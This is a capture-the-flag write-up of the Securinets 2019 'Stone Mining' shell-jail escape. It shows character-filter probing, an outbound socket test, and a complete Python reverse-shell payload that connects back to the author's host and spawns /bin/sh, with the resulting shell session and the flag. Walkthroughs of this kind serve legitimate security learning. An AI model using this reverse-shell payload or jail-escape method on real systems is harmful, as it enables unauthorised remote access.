Securinets CTF Quals 2019 - Stone Mining WriteUp
Challenge details
Event | Challenge | Category | Points | Solves |
---|---|---|---|---|
Securinets CTF Quals 2019 | Stone Mining | PWN | 1000 | 4 |
Description
I went inside a mine thinking it was safe, but got stuck. Help me out.
Service is running at: nc 52.17.200.40 4000
Author: bibiwars
A jail escape challenge this time, with no prompt, probably a shell jail.
Jail - Stone Mining
Objective is to read 'flag' file from the current directory
___________________________________________________________
we can start by executing some random commands:
shell: id, echo foobar, whoami …
python: print(“foobar”), dir() …
…
id
Not today, some blacklisted caracter has been used
echo foobar
Not today, some blacklisted caracter has been used
print("foboar")
Not today, some blacklisted caracter has been used
dir()
Not today, some blacklisted caracter has been used
We got only one message “Not today, some blacklisted caracter has been used”, which means that there are some blacklisted chars.
a
Not today, some blacklisted caracter has been used
b
Command executed :D
c
Not today, some blacklisted caracter has been used
d
Command executed :D
e
Command executed :D
f
Not today, some blacklisted caracter has been used
0
Not today, some blacklisted caracter has been used
1
Not today, some blacklisted caracter has been used
2
Not today, some blacklisted caracter has been used
3
Not today, some blacklisted caracter has been used
As we can see, at least there some allowed chars.
After some testing I found that these ascii lower case chars are allowed
ertyuopdghbn
There are other allowed chars, but I used only these char to escape the jail.
So how can we bypass that ?
I first noticed that we can use “python” word since all its chars are allowed.
I made an attempt to print to stdout, but didn’t get any output
$ nc 52.17.200.40 4000
Jail - Stone Mining
Objective is to read 'flag' file from the current directory
___________________________________________________________
python
print('foobar')
exit()
^C
So, I made an assumption that stdout, and stderr are closed, or filtered. Therefore, I attempt to connect to the outside using python sockets.
I start a listener on my host and connect to it.
Remote Host:
$ nc 52.17.200.40 4000
Jail - Stone Mining
Objective is to read 'flag' file from the current directory
___________________________________________________________
python
import socket
s = socket.socket()
s.connect(('41.102.162.29', 2130))
s.send(b'test\n')
^C
My host:
nc -vvntlp 2130
Listening on any address 2130 (xds)
Connection from 41.102.162.29:39198
test
Total received bytes: 5
Total sent bytes: 0
So it works fine, after closing the connection (CTRL+C to close netcat).
Putting the Pieces Together
The goal is getting reverse shell.
First, Run the python interpreter.
python
Then copy/past the payload there, the script won’t execute til the connection is closed, since we are using netcat we need to send interrupt signal CTRL+C to close the connection.
import subprocess
cmd = ["python","-c",'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("41.102.162.29",2130)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
subprocess.Popen(cmd)
I used “subprocess.Popen” and run the “python -c”, to spawn a new background process, in order to avoid killing the process after closing the connection. we won’t see any output in this jail, but you will get a reverser shell.
$ nc -vvntlp 2130
Listening on any address 2130 (xds)
Connection from 41.102.162.29:39190
$ id
uid=999(ctf) gid=999(ctf) groups=999(ctf)
$ ls -la
total 12
drwxr-xr-x 1 root ctf 4096 Mar 24 02:10 .
drwxr-xr-x 1 root ctf 4096 Mar 24 02:10 ..
-rwxr-x--- 1 root ctf 59 Mar 23 04:17 flag
$ cat flag
c2VjdXJpbmV0c3szODExMjc5Zjg4M2JkM2Q3ZWFkZjU3NmNlY2Y4ZDVjYn0$
$ cat flag | base64 -d
securinets{3811279f883bd3d7eadf576cecf8d5cb}
$
Jails could be escaped taking various ways.
I’m not sure if the solution I come to is the intended one.
FLAG: securinets{3811279f883bd3d7eadf576cecf8d5cb}